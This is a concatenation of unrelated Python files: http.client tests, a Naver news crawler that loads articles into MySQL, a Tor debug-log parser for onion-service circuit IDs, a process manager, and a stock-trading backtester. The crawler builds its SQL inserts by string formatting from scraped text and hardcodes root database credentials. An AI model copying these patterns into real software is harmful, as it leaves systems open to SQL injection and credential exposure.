self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as f:
f.write("body")
with open(support.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(support.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
crawling_to_db.py
|
from selenium import webdriver
import pandas as pd
from datetime import datetime
from multiprocessing import Process
from os import makedirs as mk
from os import path as pt
from os import listdir
from os.path import isfile, join
import time
import MySQLdb as db
import sys
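# Collect the article links on the current section page, open each article,
# prepend its title and save it as a text file under
# crawling/<cur_time>/<area>/; returns the running article counter.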
def crawling(area,driver, count, cur_time):
articles = driver.find_element_by_css_selector('#section_body')
article_list = articles.find_elements_by_css_selector(
'dl > dt:nth-child(2) > a')
href_list = [each.get_attribute('href') for each in article_list]
title_list = [each.text for each in article_list]
for idx, article in enumerate(href_list):
driver.get(article)
article_body = driver.find_element_by_id('articleBodyContents')
time.sleep(0.5)
posted_time = driver.find_element_by_class_name('t11')
content = article_body.text
file_name = '{}/{}-{}.txt'.format(area, count,
posted_time.text.replace(':', '-'))
dest_path = '{}/{}/{}'.format('crawling',cur_time, file_name)
with open(dest_path, 'w', encoding='UTF-8') as f:
title = '\t'+title_list[idx] + '\n\n'
f.write(title + content)
count += 1
return count
def get_page_buttons(driver):
page_buttons = driver.find_elements_by_class_name('_paging')
return [each.get_attribute('href') for each in page_buttons]
def how_many_pages_to_crawl(area, driver,cur_time, count, page_counts):
if page_counts == 0:
print('Insert more than 0')
return
buttons = get_page_buttons(driver)
    count = crawling(area, driver, count, cur_time)
page_counts -= 1
print('\t','remaining page = ' + str(page_counts))
idx = 0
while page_counts:
        # navigate to page idx
        driver.get(buttons[idx])
        # when the "next page" button is reached, refresh the button list
        if idx == 9:
            buttons = get_page_buttons(driver)
            idx = 0
            count = crawling(area, driver, count, cur_time)
        # otherwise crawl this page and advance to the next button
        else:
            count = crawling(area, driver, count, cur_time)
idx += 1
page_counts -= 1
print('\t','remaining page = ' + str(page_counts))
return count
def do_job(area, cur_time, how_many_pages = 20):
options = webdriver.ChromeOptions()
options.add_argument('headless')
options.add_argument("--disable-gpu")
options.add_argument('log-level=3')
driver = webdriver.Chrome('chromedriver.exe', chrome_options=options)
count = 0
for each in area:
area_link = each[0]
area_str = each[1]
driver.get(area_link)
print(area_str,' Crawling Started')
count = how_many_pages_to_crawl(area_str, driver, cur_time, count ,how_many_pages)
print('\t','counts of crawling = ',count)
count = 0
def mk_dir(new_path):
path = ['정치','경제','사회','세계','생활문화','IT과학']
if not pt.exists(new_path):
mk(new_path)
for area in path:
mk('{}/{}'.format(new_path,area))
def trimming(file_name):
    # 1. remove the last e-mail line (first one found scanning in reverse) and everything below it
    # 2. strip the remaining special characters (except '.')
    # 3. drop blank strings
import re
with open(file_name,'r',encoding='utf8') as f:
articles = f.readlines()
# 1.
is_email = []
for each in articles:
tmp = re.findall('[^@]+@[^@]+\.[^@]+', each)
is_email.append(tmp)
is_email = [True if len(each)!=0 else False for each in is_email]
upper_bound = len(is_email) - 2 - is_email[::-1].index(True) if True in is_email else len(is_email)-1
articles = [articles[idx] if not is_email[idx] else '' for idx in range(0,upper_bound)]
# 2.
for idx, val in enumerate(articles):
converted = re.sub('[^가-힣0-9a-zA-Z.\\s]', ' ', val)
articles[idx] = converted
# 3.
articles = [each for each in articles if each != '']
return articles
def raw_to_preprocessed(folder_name):
path = ['정치','경제','사회','세계','생활문화','IT과학']
print('Preprocess Started')
for each in path:
crawling_path = '{}/{}/{}'.format('crawling',folder_name,each)
file_names = [f for f in listdir(crawling_path) if isfile(
join(crawling_path, f)) and f.endswith(".txt")]
        # file names
full_names = ['{}/{}'.format(each, tmp) for tmp in file_names]
        # <area>/<file name>
crawling_path = ['{}/{}/{}'.format('crawling',folder_name, tmp) for tmp in full_names]
        # crawling/<area>/<file name>
for idx, file_name in enumerate(crawling_path):
trimmed = trimming(file_name)
trimmed = ''.join(trimmed)
dest_path = '{}/{}/{}'.format('preprocess',folder_name,full_names[idx])
with open(dest_path, 'w', encoding='utf-8') as f:
f.write(trimmed)
print('\t',each, ' completed !')
print('Preprocess Completed\n')
def load_whole_preprocessed(folder_name):
path = [('정치',0), ('경제',1), ('사회',2), ('세계',3), ('생활문화',4), ('IT과학',5)]
total_df = pd.DataFrame(columns=['content','area'])
def date_trimmer(raw_date):
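        # rebuild a 'date HH:MM:SS' timestamp from the file name
        # ('<count>-<posted time>.txt', where ':' was replaced by '-' on save):
        # drop the leading counter and restore ':' in the time part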
tmp = raw_date.split('/')[-1].replace('.txt',':00')
tmp = tmp.split()
return '-'.join(tmp[0].split('-')[1:]) + ' ' + tmp[1].replace('-',':')
print('loading preprocessed started')
for each in path:
preprocess_path = '{}/{}/{}'.format('preprocess',folder_name,each[0])
file_names = [f for f in listdir(preprocess_path) if isfile(
join(preprocess_path, f)) and f.endswith(".txt")]
full_names = ['{}/{}'.format(preprocess_path, tmp) for tmp in file_names]
contents = []
written_date = []
df = pd.DataFrame(columns=['content','area'])
for file_name in full_names:
with open(file_name, 'r', encoding='utf-8') as f:
contents.append(f.read())
written_date.append(file_name)
df['content'] = pd.Series(contents)
df['area'] = each[1]
df['written_date'] = pd.Series(written_date)
df['written_date'] = df['written_date'].apply(date_trimmer)
df['title'] = df['content'].apply(lambda x: x.split('\n')[0].replace('\t',''))
df = df[['title','content','written_date','area']]
total_df = total_df.append(df)
print('\t',each,' completed !')
print('loading preprocessed completed\n')
return total_df
def preprocessed_to_db(data):
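    # Insert each article row (area, title, content, written_date) into the
    # Article table; values are interpolated directly into the SQL string.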
conn = db.connect(
'127.0.0.1',
'root',
'5555',
'news_rec',
charset='utf8')
print('Preprocessed to db started')
# article to DB
curs = conn.cursor()
for idx, val in data.iterrows():
area = val['area']
title = "'{}'".format(val['title'])
content = "'{}'".format(val['content'].replace('\n', ''))
date = "'{}'".format(val['written_date'])
sql = 'INSERT INTO Article(area, title, content, written_date) VALUES({},{},{},{});'.format(
area, title, content, date)
curs.execute(sql)
conn.commit()
print('Preprocessed to db completed')
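# Naver news section URLs (sid1=100..105); the six categories are split across
# two worker processes so the crawl runs in parallel.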
def do_crawl(how_many_pages):
politic = 'http://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=100'
economy = 'http://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=101'
society = 'http://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=102'
culture = 'http://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=103'
world = 'http://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=104'
science = 'http://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=105'
area = [(politic, '정치'), (economy, '경제'), (society, '사회'),
(culture, '생활문화'), (world, '세계'), (science, 'IT과학')]
p1 = Process(target=do_job, args=(area[:3],cur_time, how_many_pages))
p1.start()
p2 = Process(target=do_job, args=(area[3:],cur_time, how_many_pages))
p2.start()
while True:
time.sleep(5)
        if p1.exitcode is not None and p2.exitcode is not None:
print('crawling completed !\n')
break
if __name__ == '__main__':
cur_time = datetime.now().strftime('%Y-%m-%d %H-%M-%S')
mk_dir('{}/{}'.format('crawling',cur_time))
how_many_pages = 20 if len(sys.argv)<=1 else int(sys.argv[1])
do_crawl(how_many_pages)
mk_dir('{}/{}'.format('preprocess',cur_time))
raw_to_preprocessed(cur_time)
preprocessed_to_db(load_whole_preprocessed(cur_time))
|
logParser.py
|
import threading, queue, re, time
DEBUG_LOG_PATH = '/var/log/tor/debug.log'
INTRO_ESTABLISHED_REGEX = r'([A-Za-z]{2,3} [0-9]{1,2} [0-9]{1,2}:[0-9]{1,2}:[0-9]{1,2}.[0-9]{0,}) \[info\] service_handle_intro_established\(\): Successfully received an INTRO_ESTABLISHED cell on circuit ([0-9]{1,}) \(id: ([0-9]{1,})\)'
START_SERVICE_NON_EPHEMERAL_REGEX = r'build_descriptors_for_new_service\(\): Hidden service ([a-z0-9]{56})'
START_SERVICE_EPHEMERAL_REGEX = r'hs_service_add_ephemeral\(\): Added ephemeral v[0-9] onion service: ([a-z0-9]{0,})'
# synchronized queue to get results back from thread
circuit_queue = queue.Queue()
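# Return [timestamp, id] for an INTRO_ESTABLISHED log line (regex groups:
# 1 = timestamp, 2 = circuit number, 3 = id), or None if the line does not match.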
def extractCircuitID(line):
circuit_id = re.search(INTRO_ESTABLISHED_REGEX, str(line))
# if there is a match, extract the circuit ID
if circuit_id is not None:
return [circuit_id.group(1), circuit_id.group(3)]
else:
return None
def parseLog(file_path, circuit_queue):
with open(file_path) as infile:
for line in infile:
circuit_id = extractCircuitID(line)
if circuit_id is not None:
# we found a circuit ID from an introduction circuit
circuit_queue.put(circuit_id)
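# Parse the debug log on a worker thread (joined immediately, so the call is
# effectively synchronous) and return every circuit ID collected so far;
# re-parsing is skipped when results are already queued.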
def startParsing():
if circuit_queue.empty():
log_t = threading.Thread(target=parseLog, args=(DEBUG_LOG_PATH, circuit_queue))
log_t.start()
log_t.join()
return list(circuit_queue.queue)
|
utils.py
|
#! coding=utf-8
__author__ = "Sriram Murali Velamur<sriram@likewyss.com>"
__all__ = ("ProcessManager",)
import sys
sys.dont_write_bytecode = True
from multiprocessing import Process, cpu_count, Pool
from time import sleep
import random
from types import FunctionType
class ProcessManager(object):
def __init__(self, slot_size=cpu_count()):
_count = cpu_count()
self.slot_size = slot_size if isinstance(slot_size, int) and \
slot_size < _count else _count
self.slots = []
self.buffer = []
self.callback_map = {}
self.response_map = {}
self.started = False
self.pool = Pool()
def add(self, handler, args=None, kwargs=None, callback=None):
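        # Wrap the handler in a Process and register its callback; it occupies
        # an active slot if one is free, otherwise it waits in the buffer.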
args = args if isinstance(args, (list, tuple)) else ()
kwargs = kwargs if isinstance(kwargs, dict) else {}
callback = callback if isinstance(
callback, FunctionType) else None
_process = Process(target=handler, args=args, kwargs=kwargs)
if len(self.slots) < self.slot_size:
self.slots.append(_process)
else:
self.buffer.append(_process)
self.callback_map[_process] = callback
def start(self):
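        # Start every process currently in a slot, then poll: finished
        # processes are terminated and removed, their callbacks fired, and
        # buffered processes are promoted into the freed slots until both the
        # slots and the buffer are empty.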
self.started = True
[item.start() for item in self.slots if not item.is_alive()
and item._popen is None]
while 1:
for item in self.slots:
if item._popen and not item.is_alive():
self.slots.remove(item)
item.terminate()
_callback = self.callback_map.get(item)
if _callback:
_callback()
if len(self.slots) < self.slot_size:
if self.buffer:
_item = self.buffer[0]
self.slots.append(_item)
self.buffer.remove(_item)
_item.start()
if not self.slots and not self.buffer:
break
else:
sleep(0.001)
def apply(self, iterable_call):
[self.add(*item) for item in iterable_call]
if not self.started:
self.start()
if __name__ == '__main__':
def test(x):
return (a**2 for a in x)
manager = ProcessManager()
manager.apply(
[(test, (range(1, random.randint(1, 10000)),))
for x in range(1, 20)])
|
backtester_vj_jj.py
|
import os
import sys
import sqlite3
import datetime
import pandas as pd
from matplotlib import gridspec
from matplotlib import pyplot as plt
from multiprocessing import Process, Queue
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import DB_TICK, DB_BACKTEST
from utility.static import strf_time, strp_time, timedelta_sec, timedelta_day
BETTING = 20000000      # betting amount per stock (KRW)
STARTDAY = 0            # start date (days before today)
TESTPERIOD = 14         # backtesting period: days before the start date
START_TIME = 100000
END_TIME = 153000
MULTI_COUNT = 6
class BackTesterVj:
def __init__(self, q_, code_list_, num_, df2_):
self.q = q_
self.code_list = code_list_
self.df_mt = df2_
self.gap_ch = num_[0]
self.avg_time = num_[1]
self.gap_sm = num_[2]
self.ch_low = num_[3]
self.dm_low = num_[4]
self.per_low = num_[5]
self.per_high = num_[6]
self.sell_ratio = num_[7]
self.code = None
self.df = None
self.totalcount = 0
self.totalcount_p = 0
self.totalcount_m = 0
self.totalholdday = 0
self.totaleyun = 0
self.totalper = 0.
self.hold = False
self.buytime = None
self.buycount = 0
self.buyprice = 0
self.sellprice = 0
self.highper = 0
self.index = 0
self.indexb = 0
self.indexn = 0
self.ccond = 0
self.Start()
def Start(self):
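        # For each assigned stock: load its tick table, derive the rolling
        # indicator columns, replay every tick inside the test window through
        # the buy/sell rules, and report the per-stock totals.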
conn = sqlite3.connect(DB_TICK)
tcount = len(self.code_list)
end_day_dt = timedelta_day(-STARTDAY)
end_day = int(strf_time('%Y%m%d', end_day_dt))
start_day = int(strf_time('%Y%m%d', timedelta_day(-TESTPERIOD, end_day_dt)))
for k, code in enumerate(self.code_list):
self.code = code
self.df = pd.read_sql(f"SELECT * FROM '{code}'", conn).set_index('index')
self.df['고저평균대비등락율'] = (self.df['현재가'] / ((self.df['고가'] + self.df['저가']) / 2) - 1) * 100
self.df['고저평균대비등락율'] = self.df['고저평균대비등락율'].round(2)
self.df['직전체결강도'] = self.df['체결강도'].shift(1)
self.df['직전당일거래대금'] = self.df['당일거래대금'].shift(1)
self.df = self.df.fillna(0)
self.df['초당거래대금'] = self.df['당일거래대금'] - self.df['직전당일거래대금']
self.df['직전초당거래대금'] = self.df['초당거래대금'].shift(1)
self.df = self.df.fillna(0)
self.df['초당거래대금평균'] = self.df['직전초당거래대금'].rolling(window=self.avg_time).mean()
self.df['체결강도평균'] = self.df['직전체결강도'].rolling(window=self.avg_time).mean()
self.df['최고체결강도'] = self.df['직전체결강도'].rolling(window=self.avg_time).max()
self.df = self.df.fillna(0)
self.totalcount = 0
self.totalcount_p = 0
self.totalcount_m = 0
self.totalholdday = 0
self.totaleyun = 0
self.totalper = 0.
self.hold = False
self.buytime = None
self.buycount = 0
self.buyprice = 0
self.sellprice = 0
self.highper = 0
self.index = 0
self.indexb = 0
self.indexn = 0
self.ccond = 0
lasth = len(self.df) - 1
for h, index in enumerate(self.df.index):
if h != 0 and index[:8] != self.df.index[h - 1][:8]:
self.ccond = 0
if int(index[:8]) <= start_day or int(index[:8]) > end_day or \
(not self.hold and (END_TIME <= int(index[8:]) or int(index[8:]) < START_TIME)):
continue
self.index = index
self.indexn = h
if not self.hold and START_TIME < int(index[8:]) < END_TIME and self.BuyTerm():
self.Buy()
elif self.hold and START_TIME < int(index[8:]) < END_TIME and self.SellTerm():
self.Sell()
elif self.hold and (h == lasth or int(index[8:]) >= END_TIME > int(self.df.index[h - 1][8:])):
self.Sell()
self.Report(k + 1, tcount)
conn.close()
def BuyTerm(self):
try:
if type(self.df['현재가'][self.index]) == pd.Series or type(self.df_mt['거래대금순위'][self.index]) == pd.Series:
return False
if self.code not in self.df_mt['거래대금순위'][self.index]:
self.ccond = 0
else:
self.ccond += 1
except KeyError:
return False
if self.ccond < self.avg_time + 1:
return False
        # strategy details not disclosed
return True
def Buy(self):
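        # Estimate the fill price for a BETTING-sized market buy by walking the
        # quoted ask levels (here only the best ask is consumed); the position
        # is opened only when the quoted quantity covers the whole order.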
매도호가5 = self.df['매도호가5'][self.index]
매도호가4 = self.df['매도호가4'][self.index]
매도호가3 = self.df['매도호가3'][self.index]
매도호가2 = self.df['매도호가2'][self.index]
매도호가1 = self.df['매도호가1'][self.index]
매도잔량5 = self.df['매도잔량5'][self.index]
매도잔량4 = self.df['매도잔량4'][self.index]
매도잔량3 = self.df['매도잔량3'][self.index]
매도잔량2 = self.df['매도잔량2'][self.index]
매도잔량1 = self.df['매도잔량1'][self.index]
현재가 = self.df['현재가'][self.index]
매수수량 = int(BETTING / 현재가)
if 매수수량 > 0:
남은수량 = 매수수량
직전남은수량 = 매수수량
매수금액 = 0
호가정보 = {매도호가1: 매도잔량1}
for 매도호가, 매도잔량 in 호가정보.items():
남은수량 -= 매도잔량
if 남은수량 <= 0:
매수금액 += 매도호가 * 직전남은수량
break
else:
매수금액 += 매도호가 * 매도잔량
직전남은수량 = 남은수량
if 남은수량 <= 0:
예상체결가 = round(매수금액 / 매수수량, 2)
self.buyprice = 예상체결가
self.buycount = 매수수량
self.hold = True
self.indexb = self.indexn
self.buytime = strp_time('%Y%m%d%H%M%S', self.index)
self.q.put(self.index)
def SellTerm(self):
self.q.put(self.index)
if type(self.df['현재가'][self.index]) == pd.Series:
return False
bg = self.buycount * self.buyprice
cg = self.buycount * self.df['현재가'][self.index]
eyun, per = self.GetEyunPer(bg, cg)
if per > self.highper:
self.highper = per
        # strategy details not disclosed
return False
def Sell(self):
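        # Estimate the average fill price for liquidating the position by
        # walking the five bid levels; the trade is booked only when the quoted
        # depth covers the whole quantity.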
매수호가1 = self.df['매수호가1'][self.index]
매수호가2 = self.df['매수호가2'][self.index]
매수호가3 = self.df['매수호가3'][self.index]
매수호가4 = self.df['매수호가4'][self.index]
매수호가5 = self.df['매수호가5'][self.index]
매수잔량1 = self.df['매수잔량1'][self.index]
매수잔량2 = self.df['매수잔량2'][self.index]
매수잔량3 = self.df['매수잔량3'][self.index]
매수잔량4 = self.df['매수잔량4'][self.index]
매수잔량5 = self.df['매수잔량5'][self.index]
남은수량 = self.buycount
직전남은수량 = 남은수량
매도금액 = 0
호가정보 = {매수호가1: 매수잔량1, 매수호가2: 매수잔량2, 매수호가3: 매수잔량3, 매수호가4: 매수잔량4, 매수호가5: 매수잔량5}
for 매수호가, 매수잔량 in 호가정보.items():
남은수량 -= 매수잔량
if 남은수량 <= 0:
매도금액 += 매수호가 * 직전남은수량
break
else:
매도금액 += 매수호가 * 매수잔량
직전남은수량 = 남은수량
if 남은수량 <= 0:
예상체결가 = round(매도금액 / self.buycount, 2)
self.sellprice = 예상체결가
self.hold = False
self.CalculationEyun()
self.highper = 0
self.indexb = 0
def CalculationEyun(self):
self.totalcount += 1
bg = self.buycount * self.buyprice
cg = self.buycount * self.sellprice
eyun, per = self.GetEyunPer(bg, cg)
self.totalper = round(self.totalper + per, 2)
self.totaleyun = int(self.totaleyun + eyun)
self.totalholdday += self.indexn - self.indexb
if per > 0:
self.totalcount_p += 1
else:
self.totalcount_m += 1
self.q.put([self.code, self.df.index[self.indexb], self.index, self.buyprice, self.sellprice, per, eyun])
# noinspection PyMethodMayBeStatic
def GetEyunPer(self, bg, cg):
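        # Net profit (KRW) and return (%) after a 0.23% transaction tax on the
        # sell amount and a 0.015% commission on each side; the tax is
        # truncated to 1 KRW and each commission to 10 KRW before settlement.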
gtexs = cg * 0.0023
gsfee = cg * 0.00015
gbfee = bg * 0.00015
texs = gtexs - (gtexs % 1)
sfee = gsfee - (gsfee % 10)
bfee = gbfee - (gbfee % 10)
pg = int(cg - texs - sfee - bfee)
eyun = pg - bg
per = round(eyun / bg * 100, 2)
return eyun, per
def Report(self, count, tcount):
if self.totalcount > 0:
plus_per = round((self.totalcount_p / self.totalcount) * 100, 2)
self.q.put([self.code, self.totalcount, self.totalholdday, self.totalcount_p, self.totalcount_m,
plus_per, self.totalper, self.totaleyun])
totalcount, totalholdday, totalcount_p, totalcount_m, plus_per, totalper, totaleyun = \
self.GetTotal(plus_per, self.totalholdday)
print(f" 종목코드 {self.code} | 보유기간합계 {totalholdday}초 | 거래횟수 {totalcount}회 | "
f" 익절 {totalcount_p}회 | 손절 {totalcount_m}회 | 승률 {plus_per}% |"
f" 수익률 {totalper}% | 수익금 {totaleyun}원 [{count}/{tcount}]")
else:
self.q.put([self.code, 0, 0, 0, 0, 0., 0., 0])
def GetTotal(self, plus_per, totalholdday):
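        # Space-pad the numeric fields so the per-stock report lines print in
        # aligned fixed-width columns on the console.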
totalcount = str(self.totalcount)
totalcount = ' ' + totalcount if len(totalcount) == 1 else totalcount
totalcount = ' ' + totalcount if len(totalcount) == 2 else totalcount
totalholdday = str(totalholdday)
totalholdday = ' ' + totalholdday if len(totalholdday) == 1 else totalholdday
totalholdday = ' ' + totalholdday if len(totalholdday) == 2 else totalholdday
totalholdday = ' ' + totalholdday if len(totalholdday) == 3 else totalholdday
totalcount_p = str(self.totalcount_p)
totalcount_p = ' ' + totalcount_p if len(totalcount_p) == 1 else totalcount_p
totalcount_p = ' ' + totalcount_p if len(totalcount_p) == 2 else totalcount_p
totalcount_m = str(self.totalcount_m)
totalcount_m = ' ' + totalcount_m if len(totalcount_m) == 1 else totalcount_m
totalcount_m = ' ' + totalcount_m if len(totalcount_m) == 2 else totalcount_m
plus_per = str(plus_per)
plus_per = ' ' + plus_per if len(plus_per.split('.')[0]) == 1 else plus_per
plus_per = ' ' + plus_per if len(plus_per.split('.')[0]) == 2 else plus_per
plus_per = plus_per + '0' if len(plus_per.split('.')[1]) == 1 else plus_per
totalper = str(self.totalper)
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 1 else totalper
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 2 else totalper
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 3 else totalper
totalper = totalper + '0' if len(totalper.split('.')[1]) == 1 else totalper
totaleyun = format(self.totaleyun, ',')
if len(totaleyun.split(',')) == 1:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 2 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 3 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 4 else totaleyun
elif len(totaleyun.split(',')) == 2:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 2 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 3 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 4 else totaleyun
elif len(totaleyun.split(',')) == 3:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
return totalcount, totalholdday, totalcount_p, totalcount_m, plus_per, totalper, totaleyun
class Total:
def __init__(self, q_, last_, num_, df1_):
super().__init__()
self.q = q_
self.last = last_
self.name = df1_
self.gap_ch = num_[0]
self.avg_time = num_[1]
self.gap_sm = num_[2]
self.ch_low = num_[3]
self.dm_low = num_[4]
self.per_low = num_[5]
self.per_high = num_[6]
self.sell_ratio = num_[7]
self.Start()
def Start(self):
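        # Drain the result queue: plain strings are tick timestamps from held
        # positions (used to count concurrently held stocks per second),
        # 7-element lists are individual trades, 8-element lists are per-stock
        # summaries; the loop ends once every stock has reported its summary.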
columns = ['거래횟수', '보유기간합계', '익절', '손절', '승률', '수익률', '수익금']
df_back = pd.DataFrame(columns=columns)
df_bct = pd.DataFrame(columns=['hold_count'])
df_tsg = pd.DataFrame(columns=['종목명', '매수시간', '매도시간', '매수가', '매도가', '수익률', 'sgm'])
k = 0
while True:
data = self.q.get()
if type(data) == str:
if data in df_bct.index:
df_bct.at[data] = df_bct['hold_count'][data] + 1
else:
df_bct.at[data] = 1
elif len(data) == 7:
name = self.name['종목명'][data[0]]
if data[2] in df_tsg.index:
df_tsg.at[data[2]] = df_tsg['종목명'][data[2]] + ';' + name, \
df_tsg['매수시간'][data[2]] + ';' + data[1], \
df_tsg['매도시간'][data[2]] + ';' + data[2], \
df_tsg['매수가'][data[2]] + ';' + str(data[3]), \
df_tsg['매도가'][data[2]] + ';' + str(data[4]), \
df_tsg['수익률'][data[2]] + ';' + str(data[5]), \
df_tsg['sgm'][data[2]] + data[6]
else:
df_tsg.at[data[2]] = name, data[1], data[2], str(data[3]), str(data[4]), str(data[5]), data[6]
else:
df_back.at[data[0]] = data[1], data[2], data[3], data[4], data[5], data[6], data[7]
k += 1
if k == self.last:
break
if len(df_back) > 0:
text = [self.gap_ch, self.avg_time, self.gap_sm, self.ch_low, self.dm_low, self.per_low, self.per_high, self.sell_ratio]
print(f' {text}')
df_back = df_back[df_back['거래횟수'] > 0]
tc = df_back['거래횟수'].sum()
if tc != 0:
pc = df_back['익절'].sum()
mc = df_back['손절'].sum()
pper = round(pc / tc * 100, 2)
avghold = round(df_back['보유기간합계'].sum() / tc, 2)
avgsp = round(df_back['수익률'].sum() / tc, 2)
tsg = int(df_back['수익금'].sum())
avgholdcount = round(df_bct['hold_count'].max(), 2)
onegm = int(BETTING * avgholdcount)
if onegm < BETTING:
onegm = BETTING
tsp = round(tsg / onegm * 100, 4)
text = f" 종목당 배팅금액 {format(BETTING, ',')}원, 필요자금 {format(onegm, ',')}원,"\
f" 거래횟수 {tc}회, 최대보유종목수 {avgholdcount}개, 평균보유기간 {avghold}초,\n 익절 {pc}회,"\
f" 손절 {mc}회, 승률 {pper}%, 평균수익률 {avgsp}%, 수익률합계 {tsp}%, 수익금합계 {format(tsg, ',')}원"
print(text)
conn = sqlite3.connect(DB_BACKTEST)
df_back.to_sql(f"vj_jj_code_{strf_time('%Y%m%d')}", conn, if_exists='append', chunksize=1000)
conn.close()
if len(df_tsg) == 0:
df_bct = pd.DataFrame(columns=['hold_count'])
if len(df_tsg) > 0:
df_tsg.sort_values(by=['매도시간'], inplace=True)
df_tsg['sgm_cumsum'] = df_tsg['sgm'].cumsum()
df_tsg[['sgm', 'sgm_cumsum']] = df_tsg[['sgm', 'sgm_cumsum']].astype(int)
df_bct['index'] = df_bct.index
df_bct.sort_values(by=['index'], inplace=True)
df_bct = df_bct.set_index('index')
conn = sqlite3.connect(DB_BACKTEST)
df_bct.to_sql(f"vj_jj_hold_{strf_time('%Y%m%d')}", conn, if_exists='append', chunksize=1000)
df_tsg.to_sql(f"vj_jj_time_{strf_time('%Y%m%d')}", conn, if_exists='append', chunksize=1000)
conn.close()
plt.figure(figsize=(12, 10))
gs = gridspec.GridSpec(nrows=2, ncols=1, height_ratios=[3, 1])
plt.subplot(gs[0])
plt.plot(df_tsg.index, df_tsg['sgm'], label='sgm')
